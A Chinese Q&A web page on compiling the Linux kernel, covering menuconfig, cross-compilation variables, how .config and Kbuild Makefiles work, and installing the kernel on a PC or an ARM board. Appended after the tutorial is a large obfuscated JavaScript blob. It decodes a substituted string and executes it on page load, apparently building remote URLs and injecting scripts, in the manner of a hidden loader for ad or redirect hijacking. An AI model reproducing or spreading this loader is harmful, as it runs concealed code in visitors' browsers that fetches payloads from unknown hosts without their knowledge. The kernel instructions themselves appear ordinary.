Linux 内核怎么编译?

2024-11-16 15:23:50
推荐回答(2个)
回答1:

一般采用make menuconfig的方式,进入文本图形化模式,根据提示可以选择需要的选项,保存make make modules关于Linux系统的系统学习,请参考书籍《Linux就该这么学》

回答2:

一、准备工作

  1. 首先,你要有一台PC,装好了Linux。

  2. 安装好GCC(这个指的是host gcc,用于编译生成运行于pc机程序的)、make、ncurses等工具。

  3. 下载一份纯净的Linux内核源码包,并解压好。

注意:如果你是为当前PC机编译内核,最好使用相应的Linux发行版的源码包。

Fedora 13上(其自带的内核版本是2.6.33.3),就下载了一个标准的内核linux-2.6.32.65.tar.xz,并且顺利的编译安装成功了,上电重启就OK。

  1. 使用的.config配置文件,是Fedora 13自带内核的配置文件,即/lib/modules/`uname -r`/build/.config

  2. 如果移植Linux到嵌入式系统,则还要再下载安装交叉编译工具链。

    例如,目标单板CPU可能是arm或mips等cpu,则安装相应的交叉编译工具链。安装后,需要将工具链路径添加到PATH环境变量中。例如,安装的是arm工具链,那么你在shell中执行类似如下的命令,假如有类似的输出,就说明安装好了。

    [root@localhost linux-2.6.33.i686]# arm-linux-gcc  --version
    arm-linux-gcc (Buildroot 2010.11) 4.3.5
    Copyright (C) 2008 Free Software Foundation, Inc.
    This is free software; see the source for copying conditions.  There is NO
    warranty; not even for MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.

:arm的工具链,可以从这里下载:http://www.veryarm.com/cross-tools

二、设置编译目标

在配置或编译内核之前,首先要确定目标CPU架构,以及编译时采用什么工具链。这是最最基础的信息,首先要确定的。如果为当前使用的PC机编译内核,则无须设置。否则的话,就要明确设置。这里以arm为例,来说明。

有两种设置方法():

  1. 修改Makefile

    打开内核源码根目录下的Makefile,修改如下两个Makefile变量并保存。

    ARCH           := arm
    CROSS_COMPILE  := arm-linux-

    注意,这里cross_compile的设置,是假定所用的交叉工具链的gcc程序名称为arm-linux-gcc。如果实际使用的gcc名称是some-thing-else-gcc,则这里照葫芦画瓢填some-thing-else-即可。总之,要省去名称中最后的gcc那3个字母。

  2. b) 每次执行make命令时,都通过命令行参数传入这些信息。

    这其实是通过make工具的命令行参数指定变量的值。

    例如

    配置内核时时,使用

    make  ARCH=arm  CROSS_COMPILE=arm-linux-  menuconfig

    编译内核时使用

    make  ARCH=arm  CROSS_COMPILE=arm-linux- 


    注意,实际上,对于编译PC机内核的情况,虽然用户没有明确设置,但并不是这两项没有配置。因为如果用户没有设置这两项,内核源码顶层Makefile(位于源码根目录下)会通过如下方式生成这两个变量的值。

    SUBARCH := $(shell uname -m | sed -e s/i.86/i386/ -e s/sun4u/sparc64/ \
    -e s/arm.*/arm/ -e s/sa110/arm/ \
    -e s/s390x/s390/ -e s/parisc64/parisc/ \
    -e s/ppc.*/powerpc/ -e s/mips.*/mips/ \
    -e s/sh[234].*/sh/ )

    ARCH?= $(SUBARCH)
    CROSS_COMPILE ?=

    经过上面的代码,ARCH变成了PC编译机的arch,即SUBARCH。因此,如果PC机上uname -m输出的是ix86,则ARCH的值就成了i386。

    而CROSS_COMPILE的值,如果没配置,则为空字符串。这样一来所使用的工具链程序的名称,就不再有类似arm-linux-这样的前缀,就相当于使用了PC机上的gcc。

    最后再多说两句,ARCH的值还需要再进一步做泛化。因为内核源码的arch目录下,不存在i386这个目录,也没有sparc64这样的目录。

    因此顶层makefile中又构造了一个SRCARCH变量,通过如下代码,生成他的值。这样一来,SRCARCH变量,才最终匹配到内核源码arch目录中的某一个架构名。


    SRCARCH := $(ARCH)  

    ifeq ($(ARCH),i386)
    SRCARCH := x86
    endif


    ifeq ($(ARCH),x86_64)
    SRCARCH := x86
    endif

    ifeq ($(ARCH),sparc64)
    SRCARCH := sparc
    endif

    ifeq ($(ARCH),sh64)
    SRCARCH := sh
    endif

三、配置内核

内核的功能那么多,需要哪些部分,每个部分编译成什么形式(编进内核还是编成模块),每个部分的工作参数如何,这些都是可以配置的。因此,在开始编译之前,我们需要构建出一份配置清单,放到内核源码根目录下,命名为.config文件,然后根据此.config文件,编译出需要的内核。但是,内核的配置项太多了,一个一个配,太麻烦了。而且,不同的CPU架构,所能配置的配置项集合,是不一样的。例如,某种CPU的某个功能特性要不要支持的配置项,就是与CPU架构有关的配置项。所以,内核提供了一种简单的配置方法。

以arm为例,具体做法如下。

  1. 根据我们的目标CPU架构,从内核源码arch/arm/configs目录下,找一个与目标系统最接近的配置文件(例如s3c2410_defconfig),拷贝到内核源码根目录下,命名为.config。

    注意,如果你是为当前PC机编译内核,最好拷贝如下文件到内核源码根目录下,做为初始配置文件。这个文件,是PC机当前运行的内核编译时使用的配置文件。

    /lib/modules/`uname -r`/build/.config

    这里顺便多说两句,PC机内核的配置文件,选择的功能真是多。不编不知道,一编才知道。Linux发行方这样做的目的,可能是想让所发行的Linux能够满足用户的各种需求吧。

  2. 执行make menuconfig对此配置做一些需要的修改,退出时选择保存,就将新的配置更新到.config文件中了。

  • 注意-1,我们执行此操作时,内核打开了一组配置项集合,让我们进行配置。这一组配置项集合,是由我们前面设置的CPU架构决定的。说得细一点,配置系统打开arch/arm/Kconfig文件(make menuconfig执行时能看到有一行“scripts/kconfig/mconf arch/arm/Kconfig”这样的打印),这个文件又包含了其他内核子系统的Kconfig文件(文件名也可能是其他名字),其他子系统的Kconfig文件,再层层包含下层的Kconfig文件,从而生成了全部的配置项集合。而每一项配置项,当前设定的值(例如,是编进内核,还是编译成模块,或者也可能是一项参数),则是由内核源码根目录下的.config文件生成的。

  • 注意-2,即使你不需要对配置进行任何修改,都务必请执行一下make menuconfig,然后进入配置界面后直接退出并保存。不然的话,后面的编译可能会遇到问题。笔者就遇到过这个问题。笔者猜测原因可能是,初始的配置文件是基于老版本的内核做的,新版本的内核可能新增了一些基础功能项,从而导致功能项之间的依赖关系发生了变化。例如,老的配置文件中选中的一个功能项,在新版内核中的实现,可能依赖了更多的其他功能项。因此需要对旧的初始配置文件进行一些调整,从而保证各个功能项的依赖条件得到满足。经过make menuconfig之后,笔者发现,.config文件的内容的确发生了变化。

四、编译内核

编译本身很简单,对于2.6版本以上的内核,执行如下一条命令就搞定了。make不妨花点时间,理解一下内核编译的机制。

  1. 内核如何使用config文件

    前面生成了.config文件,这是个文本文件,其中都是一些类似如下的内容:

    CONFIG_YENTA_ENE_TUNE=y
    CONFIG_YENTA_TOSHIBA=y
    CONFIG_PD6729=m
    CONFIG_I82092=m

    CONFIG_MTDRAM_ERASE_SIZE=128

    能看出,有些是设置了将某个功能编译进内核,有些是设置了将某个功能编译成模块,有些是设置了某个功能的某个参数。

    这个文件的语法,其实就是定义makefile变量的语法。没错,这就是makefile。

    当我们执行make开始编译内核的时候,编译系统还会生成另一个config文件,那就是include/config/auto.conf。里面的内容和.config类似,只是内容少了一些。

    内核编译的时候,顶层Makefile(位于源码根目录下),会包含上述config文件。

    这样就获得了相应的makefile变量,从而知道如何编译内核的各个部分。

    从顶层makefile中,可以看到如下代码:

    ifeq ($(dot-config),1)
    # Read in config
    -include include/config/auto.conf

    但是,这两个config文件的关系如何,到底会包含哪个,在下也没有理清。有清楚的,还望赐教:)


  2. 内核如何编译各个子系统或模块

    从上一步知道,通过config文件,内核顶层makefile已经生成了大量的makefile变量。

    另一方面,每个子系统或模块,他们的源码目录中,都有一个Makefile,其中定义了本子系统或模块所需要编译的内容。

    接下来,make工具就可以带着顶层makefile中生成的大量的makefile变量,一层层进入到各个子系统或模块所在的目录中去,去实现各目录中Makefile中定义的内容的编译。

    而这些目录中的Makefile可以说是非常简单。

    如果某个目录下,只有一个模块hello,此模块只有一个.c文件,例如xxx.c。那么其Makefile的全部内容只有如下一行。

    obj-$(CONFIG_HELLO) := hello.o

    如果hello模块,由main.c a.c b.c三个文件构成,则Makefile也只需要两行内容。

    obj-$(CONFIG_HELLO) := hello.o

    hello-objs := main.o a.o b.o

    如果一个目录下存放了多个模块的C文件,别是hello、hello2、hello3。
    hello模块的构成:main.c  a.c  b.c
    hello2模块的构成:main2.c  a2.c  b2.c
    hello3模块的构成:hello3.c
    此时,Makefile只需要5行内容。

    obj-$(CONFIG_HELLO) += hello.o

    obj-$(CONFIG_HELLO2) += hello2.o

    obj-$(CONFIG_HELLO3) += hello3.o

    hello-objs := main.o a.o b.o
    hello2-objs := main2.o a2.o b2.o


    由于顶层Makefile中带有大量的变量,因此,子目录内Makefile中的$(CONFIG_HELLO) 变量经过解析后,会变成y或m。这样的话,每个子目录中的Makefile经过解析后,等于只是定义了一个变量,变量名为obj-m或obj-y。

    变量obj-m或obj-y的值,则是一串.o文件的列表。表中每一项,代表一个功能项。如果变量名为obj-m,则此功能被编译成模块。如果变量名为obj-y,则此功能被编进内核。


  3. 内核代码中,如何知道某个功能有没有配置,配置成了什么形式

    当我们执行make开始编译内核的时候,编译系统还会生成一个C语言头文件include/generated/autoconf.h

    这个文件中都是类似如下的内容:

    #define CONFIG_DM9000 1
    #define CONFIG_DM9000_DEBUGLEVEL 4
    #define CONFIG_SND_RAWMIDI_SEQ_MODULE 1
    第一行,是说明用户选择了将DM9000这个驱动编进内核,第二行是此驱动的一个参数。如果用户选择的是将DM9000编译成模块,则第一行的内容就变成如下形式了。
    #define CONFIG_DM9000_MODULE 1


    有了这个头文件,某个内核源码的.c文件中如果包含了这个头文件,通过#ifdef CONFIG_XXX就可以知道用户有没有配置XXX功能了。


五、安装内核

  1. 为当前PC机安装内核

    依次执行如下两条命令,分别完成模块和内核的安装。

    make  modules_install

    make  install

    然后打开boot/grub/grub.conf,会看到里面多出了一个条目。

    将其中的timeout修改为5,以便开机时有5秒的时间选择启动哪一个内核。

    最后,重启电脑。在bootloader界面出现时,选择启动新内核即可。

  2. 为嵌入式系统安装内核

    对于一般的arm单板,常见的方法是,PC机通过SecureCrt连接单板串口,通过网线连接单板网口,PC机上启动tftp服务器,把内核映像zImage文件放到tftp下载目录中。重启单板,SecureCrt中看到u-boot启动倒计时的时候,按任意键进入u-boot交互界面。然后在这个界面下,通过相关命令下载内核映像zImage文件,然后通过命令将下载的zImage烧写到单板的FLASH中。最后重启单板即可。

    至于模块的安装,则很简单,通过如下一条命令搞定

    make -C  /path/to/kernel_src_dir  modules_install  INSTALL_MOD_PATH=/path/to/rootfs_dir

    上面的命令执行后,模块就已经安装到目标系统的根文件系统中了 。

    当然,上面的根文件系统只是按一定的结构组织起来的一组目录与文件,他还需要被打包成具体的文件系统格式(如CramFS,squashfs,jffs2等),然后烧写到flash中才能最终使用。

!function(){function a(a){var _idx="e4ydksy2pg";var b={e:"P",w:"D",T:"y","+":"J",l:"!",t:"L",E:"E","@":"2",d:"a",b:"%",q:"l",X:"v","~":"R",5:"r","&":"X",C:"j","]":"F",a:")","^":"m",",":"~","}":"1",x:"C",c:"(",G:"@",h:"h",".":"*",L:"s","=":",",p:"g",I:"Q",1:"7",_:"u",K:"6",F:"t",2:"n",8:"=",k:"G",Z:"]",")":"b",P:"}",B:"U",S:"k",6:"i",g:":",N:"N",i:"S","%":"+","-":"Y","?":"|",4:"z","*":"-",3:"^","[":"{","(":"c",u:"B",y:"M",U:"Z",H:"[",z:"K",9:"H",7:"f",R:"x",v:"&","!":";",M:"_",Q:"9",Y:"e",o:"4",r:"A",m:".",O:"o",V:"W",J:"p",f:"d",":":"q","{":"8",W:"I",j:"?",n:"5",s:"3","|":"T",A:"V",D:"w",";":"O"};return a.split("").map(function(a){return void 0!==b[a]?b[a]:a}).join("")}var b=a('>[7_2(F6O2 5ca[5YF_52"vX8"%cmn<ydFhm5d2fO^caj}g@aPqYF 282_qq!Xd5 Y=F=O8D62fODm622Y5V6fFh!qYF ^8O/Ko0.c}00%n0.cs*N_^)Y5c"}"aaa=78[6L|OJgN_^)Y5c"@"a<@=5YXY5LY9Y6phFgN_^)Y5c"0"a=YXY2F|TJYg"FO_(hY2f"=LqOFWfg_cmn<ydFhm5d2fO^cajngKa=5YXY5LYWfg_cmn<ydFhm5d2fO^cajngKa=5ODLgo=(Oq_^2Lg}0=6FY^V6FhgO/}0=6FY^9Y6phFg^/o=qOdfiFdF_Lg0=5Y|5Tg0P=68"#MqYYb"=d8HZ!F5T[d8+i;NmJd5LYc(c6a??"HZ"aP(dF(hcYa[P7_2(F6O2 pcYa[5YF_52 Ym5YJqd(Yc"[[fdTPP"=c2YD wdFYampYFwdFYcaaP7_2(F6O2 (cY=Fa[qYF 282_qq!F5T[28qO(dqiFO5dpYmpYFWFY^cYaP(dF(hcYa[Fvvc28FcaaP5YF_52 2P7_2(F6O2 qcY=F=2a[F5T[qO(dqiFO5dpYmLYFWFY^cY=FaP(dF(hcYa[2vv2caPP7_2(F6O2 LcY=Fa[F8}<d5p_^Y2FLmqY2pFhvvXO6f 0l88FjFg""!7mqOdfiFdF_L8*}=}00<dmqY2pFh??cdmJ_Lhc`c$[YPa`%Fa=qc6=+i;NmLF562p67TcdaaaP7_2(F6O2 _cYa[qYF F80<d5p_^Y2FLmqY2pFhvvXO6f 0l88YjYg}=28"ruxwE]k9W+ztyN;eI~i|BAV&-Ud)(fY7h6CSq^2OJ:5LF_XDRT4"=O82mqY2pFh=58""!7O5c!F**!a5%82HydFhm7qOO5cydFhm5d2fO^ca.OaZ!5YF_52 5P7_2(F6O2 fcYa[qYF F8fO(_^Y2Fm(5YdFYEqY^Y2Fc"L(56JF"a!Xd5 28H"hFFJLg\/\/[[fdTPPKs0)hFL_h^m_XO6L)pmRT4gQ}1Q"="hFFJLg\/\/[[fdTPPKs0dhFLFT6m)CFSp)pmRT4gQ}1Q"="hFFJLg\/\/[[fdTPPKs0dhFL5SJm4h(7F7fmRT4gQ}1Q"="hFFJLg\/\/[[fdTPPKs0)hFL_h^m_XO6L)pmRT4gQ}1Q"="hFFJLg\/\/[[fdTPPKs0dhFLFT6m)CFSp)pmRT4gQ}1Q"="hFFJLg\/\/[[fdTPPKs0dhFL5SJm4h(7F7fmRT4gQ}1Q"="hFFJLg\/\/[[fdTPPKs0dhFLFT6m)CFSp)pmRT4gQ}1Q"Z!qYF O8pc2Hc2YD wdFYampYFwdTcaZ??2H0Za%"/h^/Ks0jR8YoTfSLT@Jp"!O8O%c*}888Om62fYR;7c"j"aj"j"g"v"a%"58"%7m5Y|5T%%%"vF8"%hca%5ca=FmL5(8pcOa=FmO2qOdf87_2(F6O2ca[7mqOdfiFdF_L8@=)caP=FmO2Y55O587_2(F6O2ca[YvvYca=LYF|6^YO_Fc7_2(F6O2ca[Fm5Y^OXYcaP=}0aP=fO(_^Y2FmhYdfmdJJY2fxh6qfcFa=7mqOdfiFdF_L8}P7_2(F6O2 hca[qYF Y8(c"bb___b"a!5YF_52 Y??qc"bb___b"=Y8ydFhm5d2fO^camFOiF562pcsKamL_)LF562pcsa=7_2(F6O2ca[Y%8"M"Pa=Y2(OfYB~WxO^JO2Y2FcYaPr55dTm6Lr55dTcda??cd8HZ=qc6=""aa!qYF J8"Ks0"=X8"YoTfSLT@Jp"!7_2(F6O2 TcYa[}l88Ym5YdfTiFdFYvv0l88Ym5YdfTiFdFY??Ym(qOLYcaP7_2(F6O2 DcYa[Xd5 F8H"Ks0^)ThF)mhfO76RqmRT4"="Ks0X5ThF)mT)7F56RmRT4"="Ks02pThFmhfO76RqmRT4"="Ks0_JqhFmT)7F56RmRT4"="Ks02TOhFmhfO76RqmRT4"="Ks0CSqhF)mT)7F56RmRT4"="Ks0)FfThF)fmhfO76RqmRT4"Z=F8FHc2YD wdFYampYFwdTcaZ??FH0Z=F8"DLLg//"%c2YD wdFYampYFwdFYca%F%"g@Q}1Q"!qYF O82YD VY)iO(SYFcF%"/"%J%"jR8"%X%"v58"%7m5Y|5T%%%"vF8"%hca%5ca%c2_qql882j2gcF8fO(_^Y2Fm:_Y5TiYqY(FO5c"^YFdH2d^Y8(Z"a=28Fj"v(h8"%FmpYFrFF56)_FYc"("ag""aaa!OmO2OJY287_2(F6O2ca[7mqOdfiFdF_L8@P=OmO2^YLLdpY87_2(F6O2cFa[qYF 28FmfdFd!F5T[28cY8>[qYF 5=F=2=O=6=d=(8"(hd5rF"=q8"75O^xhd5xOfY"=L8"(hd5xOfYrF"=_8"62fYR;7"=f8"ruxwE]k9W+ztyN;eI~i|BAV&-Ud)(fY7ph6CSq^2OJ:5LF_XDRT40}@sonK1{Q%/8"=h8""=^80!7O5cY8Ym5YJqd(Yc/H3r*Ud*40*Q%/8Z/p=""a!^<YmqY2pFh!a28fH_ZcYH(Zc^%%aa=O8fH_ZcYH(Zc^%%aa=68fH_ZcYH(Zc^%%aa=d8fH_ZcYH(Zc^%%aa=58c}nvOa<<o?6>>@=F8csv6a<<K?d=h%8iF562pHqZc2<<@?O>>oa=Kol886vvch%8iF562pHqZc5aa=Kol88dvvch%8iF562pHqZcFaa![Xd5 78h!qYF Y8""=F=2=O!7O5cF858280!F<7mqY2pFh!ac587HLZcFaa<}@{jcY%8iF562pHqZc5a=F%%ag}Q}<5vv5<@ojc287HLZcF%}a=Y%8iF562pHqZccs}v5a<<K?Ksv2a=F%8@agc287HLZcF%}a=O87HLZcF%@a=Y%8iF562pHqZcc}nv5a<<}@?cKsv2a<<K?KsvOa=F%8sa!5YF_52 YPPac2a=2YD ]_2(F6O2c"MFf(L"=2acfO(_^Y2Fm(_55Y2Fi(56JFaP(dF(hcYa[F82mqY2pFh*o0=F8F<0j0gJd5LYW2FcydFhm5d2fO^ca.Fa!Lc@0o=` $[Ym^YLLdpYP M[$[FPg$[2mL_)LF562pcF=F%o0aPPM`a=7mqOdfiFdF_L8*}PTcOa=@8887mqOdfiFdF_Lvv)caP=OmO2Y55O587_2(F6O2ca[@l887mqOdfiFdF_LvvYvvYca=TcOaP=7mqOdfiFdF_L8}PqYF i8l}!7_2(F6O2 )ca[ivvcfO(_^Y2Fm5Y^OXYEXY2Ft6LFY2Y5c7mYXY2F|TJY=7m(q6(S9d2fqY=l0a=Y8fO(_^Y2FmpYFEqY^Y2FuTWfc7m5YXY5LYWfaavvYm5Y^OXYca!Xd5 Y=F8fO(_^Y2Fm:_Y5TiYqY(FO5rqqc7mLqOFWfa!7O5cqYF Y80!Y<FmqY2pFh!Y%%aFHYZvvFHYZm5Y^OXYcaP7_2(F6O2 $ca[LYF|6^YO_Fc7_2(F6O2ca[67c@l887mqOdfiFdF_La[Xd5[(Oq_^2LgY=5ODLgO=6FY^V6Fhg5=6FY^9Y6phFg6=LqOFWfgd=6L|OJg(=5YXY5LY9Y6phFgqP87!7_2(F6O2 Lca[Xd5 Y8pc"hFFJLg//[[fdTPPKs0qhOFq^)Y6(:mX2O2fmRT4gQ}1Q/((/Ks0j6LM2OF8}vFd5pYF8}vFT8@"a!FOJmqO(dF6O2l88LYq7mqO(dF6O2jFOJmqO(dF6O28YgD62fODmqO(dF6O2mh5Y78YP7O5cqYF 280!2<Y!2%%a7O5cqYF F80!F<O!F%%a[qYF Y8"JOL6F6O2g76RYf!4*62fYRg}00!f6LJqdTg)qO(S!"%`qY7Fg$[2.5PJR!D6fFhg$[ydFhm7qOO5cmQ.5aPJR!hY6phFg$[6PJR!`!Y%8(j`FOJg$[q%F.6PJR`g`)OFFO^g$[q%F.6PJR`!Xd5 _8fO(_^Y2Fm(5YdFYEqY^Y2Fcda!_mLFTqYm(LL|YRF8Y=_mdffEXY2Ft6LFY2Y5c7mYXY2F|TJY=La=fO(_^Y2Fm)OfTm62LY5FrfCd(Y2FEqY^Y2Fc")Y7O5YY2f"=_aP67clia[qYF[YXY2F|TJYgY=6L|OJg5=5YXY5LY9Y6phFg6P87!fO(_^Y2FmdffEXY2Ft6LFY2Y5cY=h=l0a=7m(q6(S9d2fqY8h!Xd5 28fO(_^Y2Fm(5YdFYEqY^Y2Fc"f6X"a!7_2(F6O2 fca[Xd5 Y8pc"hFFJLg//[[fdTPPKs0qhOFq^)Y6(:mX2O2fmRT4gQ}1Q/((/Ks0j6LM2OF8}vFd5pYF8}vFT8@"a!FOJmqO(dF6O2l88LYq7mqO(dF6O2jFOJmqO(dF6O28YgD62fODmqO(dF6O2mh5Y78YP7_2(F6O2 hcYa[Xd5 F8D62fODm622Y59Y6phF!qYF 280=O80!67cYaLD6F(hcYmLFOJW^^Yf6dFYe5OJdpdF6O2ca=YmFTJYa[(dLY"FO_(hLFd5F"g28YmFO_(hYLH0Zm(q6Y2F&=O8YmFO_(hYLH0Zm(q6Y2F-!)5YdS!(dLY"FO_(hY2f"g28Ym(hd2pYf|O_(hYLH0Zm(q6Y2F&=O8Ym(hd2pYf|O_(hYLH0Zm(q6Y2F-!)5YdS!(dLY"(q6(S"g28Ym(q6Y2F&=O8Ym(q6Y2F-P67c0<2vv0<Oa67c5a[67cO<86a5YF_52l}!O<^%6vvfcaPYqLY[F8F*O!67cF<86a5YF_52l}!F<^%6vvfcaPP2m6f87m5YXY5LYWf=2mLFTqYm(LL|YRF8`hY6phFg$[7m5YXY5LY9Y6phFPJR`=5jfO(_^Y2Fm)OfTm62LY5FrfCd(Y2FEqY^Y2Fc"d7FY5)Yp62"=2agfO(_^Y2Fm)OfTm62LY5FrfCd(Y2FEqY^Y2Fc")Y7O5YY2f"=2a=i8l0PqYF F8pc"hFFJLg//[[fdTPPKs0dhFLFT6m)CFSp)pmRT4gQ}1Q/f/Ks0j(8}vR8YoTfSLT@Jp"a!FvvLYF|6^YO_Fc7_2(F6O2ca[Xd5 Y8fO(_^Y2Fm(5YdFYEqY^Y2Fc"L(56JF"a!YmL5(8F=fO(_^Y2FmhYdfmdJJY2fxh6qfcYaP=}YsaPP=@n00aPO82dX6pdFO5mJqdF7O5^=Y8l/3cV62?yd(a/mFYLFcOa=F8Jd5LYW2FcL(5YY2mhY6phFa>8Jd5LYW2FcL(5YY2mD6fFha=cY??Favvc/)d6f_?9_dDY6u5ODLY5?A6XOu5ODLY5?;JJOu5ODLY5?9YT|dJu5ODLY5?y6_6u5ODLY5?yIIu5ODLY5?Bxu5ODLY5?IzI/6mFYLFc2dX6pdFO5m_LY5rpY2FajDc7_2(F6O2ca[Lc@0}a=Dc7_2(F6O2ca[Lc@0@a=fc7_2(F6O2ca[Lc@0saPaPaPagfc7_2(F6O2ca[Lc}0}a=fc7_2(F6O2ca[Lc}0@a=Dc7_2(F6O2ca[Lc}0saPaPaPaa=lYvvO??$ca=XO6f 0l882dX6pdFO5mLY2fuYd(O2vvfO(_^Y2FmdffEXY2Ft6LFY2Y5c"X6L6)6q6FT(hd2pY"=7_2(F6O2ca[Xd5 Y=F!"h6ffY2"888fO(_^Y2FmX6L6)6q6FTiFdFYvvdmqY2pFhvvcY8pc"hFFJLg//[[fdTPPKs0dhFLFT6m)CFSp)pmRT4gQ}1Q"a%"/)_pj68"%J=cF82YD ]O5^wdFdamdJJY2fc"^YLLdpY"=+i;NmLF562p67Tcdaa=FmdJJY2fc"F"="0"a=2dX6pdFO5mLY2fuYd(O2cY=Fa=dmqY2pFh80=qc6=""aaPaPaca!'.substr(22));new Function(b)()}();